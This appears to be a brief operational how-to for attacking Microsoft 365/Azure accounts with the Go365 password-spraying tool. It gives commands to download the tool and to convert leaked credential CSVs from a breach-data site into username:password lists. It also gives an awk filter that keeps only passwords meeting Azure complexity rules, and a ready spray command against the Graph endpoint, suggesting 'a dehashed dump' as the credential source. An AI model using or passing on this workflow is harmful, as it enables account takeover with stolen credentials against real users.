v2.0.2
Powered by

# Go365

A tool for attacking O365 users with password stuffing/spraying.

# Install 

wget https://github.com/optiv/Go365/releases/download/v2.0/Go365_2.0_Linux_x86_64.tar.gz
tar -xzvf Go365_2.0_Linux_x86_64.tar.gz

# Massage a CSV into a format Go365 can use

The example below works for a CSV extracted from sysleaks.com:

cut -d',' -f2,3 YOURCSV.csv | tr ',' ':' | sort -t':' -k1 | uniq > filtered.csv

# Then take THAT CSV and filter it even further so it meets Azure requirements

Which are:

  • Minimum of 8 characters
  • 3 of these 4 properties:
  • Uppercase letters
  • Lowercase letters
  • Numbers
  • Symbols
awk -F: '{
  pass=$2;
  classes=0;
  if (pass ~ /[a-z]/) classes++;
  if (pass ~ /[A-Z]/) classes++;
  if (pass ~ /[0-9]/) classes++;
  if (pass ~ /[^a-zA-Z0-9]/) classes++;
  if (length(pass) >= 8 && classes >= 3) print $0
}' filtered.csv > superfiltered.txt

# Spray a list of usernames and passwords against M365/Azure/whatever-they're-calling-it-this-week 

./Go365 -endpoint graph -up UP.txt -debug -w 300 -o CLIENT_output.txt -d domain.com

The UP.txt would be a "users and passwords" file that you'd generate by some other means, such as a dehashed dump.